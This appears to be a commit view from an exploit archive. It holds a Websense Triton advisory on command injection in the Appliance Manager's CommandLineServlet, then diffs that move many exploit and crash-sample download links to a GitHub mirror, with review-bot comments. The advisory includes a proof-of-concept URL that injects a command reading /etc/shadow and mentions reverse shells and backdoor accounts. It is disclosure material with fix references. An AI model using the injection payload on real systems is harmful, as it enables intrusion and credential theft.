Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location:
http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions
This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
Introduction
Websense Data Security Suite contains three modules - Data Security Gateway, Data Discover, and Data Endpoint - that can help manage the risk of losing your data to malicious users or accidental misuse.
The Websense Appliance Manager GUI has a web-based 'command line utility' that provides the ability to execute various network debugging commands, which can be run on any module; Appliance Controller, Content Gateway, Web Security, Network Agent, Email Security Gateway. This command line utility is affected by command injection that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance.
Details
The CommandLineServlet Java Servlet is responsible for enforcing limitations on the type of network debugging commands users are allowed to run using the GUI. An attacker is able to bypass these limitations by breaking out of any network diagnostics command that requires a second parameter (in this example Destination). This allows the attacker to inject arbitrary system commands. For example, the pipe character (|) is used to redirect the output from one process into the input of another, enabling multiple commands to be chained together. An attacker can leverage this behavior to execute any available system command (such as adduser or nc to start a reverse shell). The output is returned to the user, the commands are executed with elevated privileges (root).
With a little help of social engineering (like sending a link via email/chat), an attacker may trick authenticated users to execute arbitrary commands on behalf of the attacker. A more effective attack would be to abuse other Websense vulnerabilities like Cross-Site Scripting.
The following proof of concept will return the contents of /etc/shadow on affected appliances:
https://host:9447/appmng/servlet/CommandLineServlet?type=exec&uuid=asdfasdf&module=na1&command=ping&Destination=127.0.0.1'|cat%20/etc/shadow'
Other attack scenarios are also possible, like creating a backdoor account on the appliance.
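Review bot: This new file opens directly at "Abstract" and carries no author, source URL, publication date or advisory/CVE identifier, unlike other entries in this commit that have header lines such as "# Tested on:" and "# CVE :". Please add a header block so the entry can be traced to its origin and matched against the vendor articles under "Fix". The "Fix" section is also unclear for defenders: the issue is reported against Triton v7.8.3, but the hotfix is described for v7.8.4, so it should say whether 7.8.3 installations must upgrade before the hotfix applies. Minor wording: "a remote unauthenticated attacks" and "about the fixed".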

View file

@ -43,7 +43,7 @@ by knowing only an address belonging to the application and the offset2lib value
+------------------+ +------------------+
The proof of concept exploit code is available here: The proof of concept exploit code is available here:
http://www.exploit-db.com/sploits/35472.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35472.tgz
http://packetstormsecurity.com/files/129398 http://packetstormsecurity.com/files/129398
+------------------------------------------------------------------------------+ +------------------------------------------------------------------------------+

View file

@ -2,7 +2,7 @@ Sources:
http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
https://code.google.com/p/google-security-research/issues/detail?id=283 https://code.google.com/p/google-security-research/issues/detail?id=283
Full PoC: http://www.exploit-db.com/sploits/36310.tar.gz Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36310.tar.gz
This is a proof-of-concept exploit that is able to gain kernel This is a proof-of-concept exploit that is able to gain kernel
privileges on machines that are susceptible to the DRAM "rowhammer" privileges on machines that are susceptible to the DRAM "rowhammer"

View file

@ -2,7 +2,7 @@ Sources:
http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
https://code.google.com/p/google-security-research/issues/detail?id=284 https://code.google.com/p/google-security-research/issues/detail?id=284
Full PoC: http://www.exploit-db.com/sploits/36311.tar.gz Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36311.tar.gz
This is a proof-of-concept exploit that is able to escape from Native This is a proof-of-concept exploit that is able to escape from Native

View file

@ -4,4 +4,4 @@ Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shi
It should be noted that the SITE INDEX command is affected as well. It should be noted that the SITE INDEX command is affected as well.
http://www.exploit-db.com/sploits/20032.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20032.tar.gz

View file

@ -1,5 +1,5 @@
# linux/x86 xor-encoded Connect Back Shellcode 371 bytes # linux/x86 xor-encoded Connect Back Shellcode 371 bytes
http://www.exploit-db.com/sploits/black-RXenc-con-back.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/black-RXenc-con-back.tar.gz
# milw0rm.com [2006-04-18] # milw0rm.com [2006-04-18]

View file

@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable. NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-11-22-bibtex-crash.tar.bz2 Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-bibtex-crash.tar.bz2

View file

@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi
Expat 2.0.1 is vulnerable; other versions may also be affected. Expat 2.0.1 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/2009-11-22-36097.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097.gz
http://www.exploit-db.com/sploits/2009-11-22-36097-2.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097-2.gz

View file

@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera
Versions up to and including libTIFF 3.9.4 are vulnerable. Versions up to and including libTIFF 3.9.4 are vulnerable.
PoC: PoC:
http://www.exploit-db.com/sploits/lp589145-sample.tif.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lp589145-sample.tif.gz

View file

@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki
-- --
http://pi3.com.pl http://pi3.com.pl
http://www.exploit-db.com/sploits/p_cve-2011-4362.c https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/p_cve-2011-4362.c
http://blog.pi3.com.pl/?p=277 http://blog.pi3.com.pl/?p=277

View file

@ -52,4 +52,4 @@ si_addr:$2 = (void *) 0xaf625080 <gst_riff_create_audio_caps+1888>
Proof of concept included. Proof of concept included.
http://www41.zippyshare.com/v/13083235/file.html http://www41.zippyshare.com/v/13083235/file.html
http://www.exploit-db.com/sploits/23427.rar https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23427.rar
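Review bot: Only the exploit-db.com line is rewritten in this hunk; the zippyshare.com link directly above it stays as the first download location under "Proof of concept included." That is a third-party file host outside the project's control, so the file it serves cannot be assumed to match the mirrored 23427.rar. Consider removing it, or labelling the GitHub link as the canonical copy.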

View file

@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a remote denial of service
Exploitation of this issue may cause the affected GameSpy developed game to crash, denying service to legitimate users. Exploitation of this issue may cause the affected GameSpy developed game to crash, denying service to legitimate users.
http://www.exploit-db.com/sploits/23757.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23757.zip

View file

@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a buffer overflow vulnerab
Exploitation of this issue may allow attackers to execute arbitrary machine code in the context of the affected GameSpy developed game. Exploitation of this issue may allow attackers to execute arbitrary machine code in the context of the affected GameSpy developed game.
http://www.exploit-db.com/sploits/24815.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24815.zip

View file

@ -10,7 +10,7 @@ Sorry I forgot to write headers in previous mail.
# Tested on: [GNU/Linux] # Tested on: [GNU/Linux]
# CVE : [CVE-2012-1663] # CVE : [CVE-2012-1663]
PoC: http://www.exploit-db.com/sploits/24865.tar.bz2 PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24865.tar.bz2
I'm glad to share this to you guys. The test code was attached. You I'm glad to share this to you guys. The test code was attached. You
also could find them here: also could find them here:

View file

@ -4,8 +4,8 @@ LibTIFF is affected by multiple denial-of-service vulnerabilities.
An attacker can exploit these vulnerabilities to cause a denial of service in applications using the affected library. An attacker can exploit these vulnerabilities to cause a denial of service in applications using the affected library.
http://www.exploit-db.com/sploits/27762-1.tiff.0 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-1.tiff.0
http://www.exploit-db.com/sploits/27762-2.tiff.1 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-2.tiff.1
http://www.exploit-db.com/sploits/27762-3.tiff.100 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-3.tiff.100

View file

@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to an integer-overflow vulnerab
An attacker could exploit this vulnerability to execute arbitrary code in the context of the vulnerable application that uses the affected library. Failed exploit attempts will likely cause denial-of-service conditions. An attacker could exploit this vulnerability to execute arbitrary code in the context of the vulnerable application that uses the affected library. Failed exploit attempts will likely cause denial-of-service conditions.
http://www.exploit-db.com/sploits/27764.tiff.11 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27764.tiff.11

View file

@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to a double-free vulnerability;
Attackers may be able to exploit this issue to cause denial-of-service conditions in affected applications using a vulnerable version of the library; arbitrary code execution may also be possible. Attackers may be able to exploit this issue to cause denial-of-service conditions in affected applications using a vulnerable version of the library; arbitrary code execution may also be possible.
http://www.exploit-db.com/sploits/27765.tiff.2 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27765.tiff.2

View file

@ -6,4 +6,4 @@ This vulnerability allows local users to cause a kernel panic, denying further s
This issue affects Linux kernel versions 2.6.15 through 2.6.17-rc5 on multiprocessor computers running SMP kernels. Other kernel versions may also be affected. This issue affects Linux kernel versions 2.6.15 through 2.6.17-rc5 on multiprocessor computers running SMP kernels. Other kernel versions may also be affected.
http://www.exploit-db.com/sploits/27925.tgz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27925.tgz

View file

@ -8,4 +8,4 @@ Exploiting this issue could allow attacker-supplied machine code to execute in t
ClamAV versions 0.88.2 and 0.88.3 are vulnerable to this issue; prior versions may also be affected. ClamAV versions 0.88.2 and 0.88.3 are vulnerable to this issue; prior versions may also be affected.
http://www.exploit-db.com/sploits/28348.exe https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28348.exe

View file

@ -6,4 +6,4 @@ Remote attackers may trigger this issue by sending crafted UDP datagrams to affe
Linux kernel versions 2.6.14.4, 2.6.17.6, and 2.6.17.7 are vulnerable to this issue; other versions in the 2.6 series are also likely affected. Linux kernel versions 2.6.14.4, 2.6.17.6, and 2.6.17.7 are vulnerable to this issue; other versions in the 2.6 series are also likely affected.
http://www.exploit-db.com/sploits/28358.tar.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28358.tar.gz

View file

@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex
AlsaPlayer 0.99.76, the CVS version as of 9 Aug 2006, and prior versions are vulnerable to this issue; other versions may also be affected. AlsaPlayer 0.99.76, the CVS version as of 9 Aug 2006, and prior versions are vulnerable to this issue; other versions may also be affected.
http://www.exploit-db.com/sploits/28367.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28367.zip

View file

@ -6,4 +6,4 @@ Attackers may likely exploit this issue to execute arbitrary machine code in the
Mozilla Firefox is vulnerable to this issue. Due to code reuse, other Mozilla products are also likely affected. Mozilla Firefox is vulnerable to this issue. Due to code reuse, other Mozilla products are also likely affected.
http://www.exploit-db.com/sploits/28380.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28380.zip

View file

@ -6,4 +6,4 @@ This issue allows attackers to execute arbitrary machine code in the context of
ImageMagick versions in the 6.x series, up to version 6.2.8, are vulnerable to this issue. ImageMagick versions in the 6.x series, up to version 6.2.8, are vulnerable to this issue.
http://www.exploit-db.com/sploits/28383.sgi https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28383.sgi

View file

@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex
Versions 2.1.2, SVN 8406, and prior are vulnerable to this issue; other versions may also be affected. Versions 2.1.2, SVN 8406, and prior are vulnerable to this issue; other versions may also be affected.
http://www.exploit-db.com/sploits/28384.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28384.zip

View file

@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected computer, denying service to legitimate users. An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.
http://www.exploit-db.com/sploits/28895.img.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28895.img.gz

View file

@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability. This issue
An attacker can exploit this issue to crash the affected computer, denying service to legitimate users. An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.
http://www.exploit-db.com/sploits/28912.iso.bz2 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28912.iso.bz2

View file

@ -4,4 +4,4 @@ Multiple PDF readers are prone to multiple remote buffer-overflow vulnerabilitie
An attacker may be able exploit this issue to execute arbitrary code within the context of the affected application. In some circumstances, the vulnerability can be exploited only to cause a denial of service. An attacker may be able exploit this issue to execute arbitrary code within the context of the affected application. In some circumstances, the vulnerability can be exploited only to cause a denial of service.
http://www.exploit-db.com/sploits/29399.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29399.pdf

View file

@ -4,4 +4,4 @@ Applications using the gtk2 library may be prone to a denial-of-service vulnerab
An attacker can exploit this issue to crash applications on a victim's computer. An attacker can exploit this issue to crash applications on a victim's computer.
http://www.exploit-db.com/sploits/29520.mbox https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29520.mbox

View file

@ -10,4 +10,4 @@ Firefox 2.0.0.2 is prone to this issue; other versions may also be affected.
GIMP version 2.2.12 is also reported vulnerable; a segmentation fault occurs when the application processes a malicious GIF image. GIMP version 2.2.12 is also reported vulnerable; a segmentation fault occurs when the application processes a malicious GIF image.
http://www.exploit-db.com/sploits/29723.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29723.zip

View file

@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to consume excessive system resour
PulseAudio 0.9.5 is vulnerable to this issue. PulseAudio 0.9.5 is vulnerable to this issue.
http://www.exploit-db.com/sploits/29809.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29809.zip

View file

@ -6,4 +6,4 @@ Successful exploits of this vulnerability allow remote attackers to execute arbi
Versions of libexif prior to 0.6.14 are vulnerable to this issue. Versions of libexif prior to 0.6.14 are vulnerable to this issue.
http://www.exploit-db.com/sploits/30024.jpg https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30024.jpg

View file

@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary machine code in the
This issue affects versions prior to AlsaPlayer 0.99.80-rc3. This issue affects versions prior to AlsaPlayer 0.99.80-rc3.
http://www.exploit-db.com/sploits/30648.ogg https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30648.ogg

View file

@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the application, resulting in denial-o
LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected. LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/30776.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30776.zip

View file

@ -6,4 +6,4 @@ Attackers can exploit this issue to cause denial-of-service conditions. Given th
QEMU 0.9.0 is vulnerable; other versions may also be affected. QEMU 0.9.0 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/30837.rar https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30837.rar

View file

@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary
These issues affect PeerCast 0.12.17, SVN 334 and prior versions. These issues affect PeerCast 0.12.17, SVN 334 and prior versions.
http://www.exploit-db.com/sploits/30894.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30894.zip

View file

@ -6,7 +6,7 @@ Successfully exploiting this issue allows remote attackers to deny service to le
These issues affect GStreamer 0.10.15; other versions may also be vulnerable. These issues affect GStreamer 0.10.15; other versions may also be vulnerable.
http://www.exploit-db.com/sploits/31018-1.mpg https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-1.mpg
http://www.exploit-db.com/sploits/31018-2.mpg https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-2.mpg
http://www.exploit-db.com/sploits/31018-3.m2v https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-3.m2v
http://www.exploit-db.com/sploits/31018-4.m2v https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-4.m2v

View file

@ -6,4 +6,4 @@ Attackers can leverage this issue to execute arbitrary code in the context of an
Versions prior to SDL_image 1.2.7 are vulnerable. Versions prior to SDL_image 1.2.7 are vulnerable.
http://www.exploit-db.com/sploits/31054.gif https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31054.gif

View file

@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash the affected
This issue affects freeSSHd 1.2.0 and prior versions. This issue affects freeSSHd 1.2.0 and prior versions.
http://www.exploit-db.com/sploits/31218.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31218.zip

View file

@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
These issues affect Wireshark 0.99.2 up to and including 0.99.8. These issues affect Wireshark 0.99.2 up to and including 0.99.8.
http://www.exploit-db.com/sploits/31552.pcap https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31552.pcap

View file

@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
These issues affect Wireshark 0.99.2 up to and including 0.99.8. These issues affect Wireshark 0.99.2 up to and including 0.99.8.
http://www.exploit-db.com/sploits/31553.pcap https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31553.pcap

View file

@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
These issues affect Wireshark 0.99.2 up to and including 0.99.8. These issues affect Wireshark 0.99.2 up to and including 0.99.8.
http://www.exploit-db.com/sploits/31554.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31554.gz

View file

@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting
This issue affects Firefox 3 running on Ubuntu Linux 8.04; other versions running on different platforms may also be affected. This issue affects Firefox 3 running on Ubuntu Linux 8.04; other versions running on different platforms may also be affected.
http://www.exploit-db.com/sploits/31984.jpg https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31984.jpg

View file

@ -6,4 +6,4 @@ This issue arises when the software handles maliciously crafted SVG images.
According to reports, the latest versions of Firefox, Evince, EoG, and GIMP are vulnerable. According to reports, the latest versions of Firefox, Evince, EoG, and GIMP are vulnerable.
http://www.exploit-db.com/sploits/32018.svg https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32018.svg

View file

@ -6,4 +6,4 @@ Remote attackers can exploit this issue by enticing victims into opening malicio
Successful exploits may allow attackers to execute arbitrary code within the context of an affected application. Failed exploit attempts will likely result in a denial of service. Successful exploits may allow attackers to execute arbitrary code within the context of an affected application. Failed exploit attempts will likely result in a denial of service.
http://www.exploit-db.com/sploits/32019.iki https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32019.iki

View file

@ -17,4 +17,4 @@ UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.
UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available. UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available.
http://www.exploit-db.com/sploits/32452.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32452.zip

View file

@ -6,4 +6,4 @@ Attackers can exploit this issue to cause a kernel panic, denying service to leg
QNX RTOS 6.4.0 is vulnerable; other versions may also be affected. QNX RTOS 6.4.0 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/32740.bin https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32740.bin

View file

@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the kernel to crash, denying service t
This issue affects versions prior to Linux kernel 2.6.27.14. This issue affects versions prior to Linux kernel 2.6.27.14.
http://www.exploit-db.com/sploits/32775.gz https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32775.gz

View file

@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash applications
These issues affect versions prior to Poppler 0.10.4. These issues affect versions prior to Poppler 0.10.4.
http://www.exploit-db.com/sploits/32800.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32800.pdf

View file

@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal
Successfully exploiting this issue allows remote attackers to deny service to legitimate users. Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
http://www.exploit-db.com/sploits/32856.aac https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32856.aac

View file

@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal
Successfully exploiting this issue allows remote attackers to deny service to legitimate users. Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
http://www.exploit-db.com/sploits/32857.ogm https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32857.ogm

View file

@ -8,4 +8,4 @@ Acrobat 9.1.1 is vulnerable; other versions may also be affected.
NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely. NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely.
http://www.exploit-db.com/sploits/33017.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33017.pdf

View file

@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co
LibTIFF 3.8.2 is vulnerable; other versions may be affected as well. LibTIFF 3.8.2 is vulnerable; other versions may be affected as well.
http://www.exploit-db.com/sploits/33049.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33049.zip

Some files were not shown because too many files have changed in this diff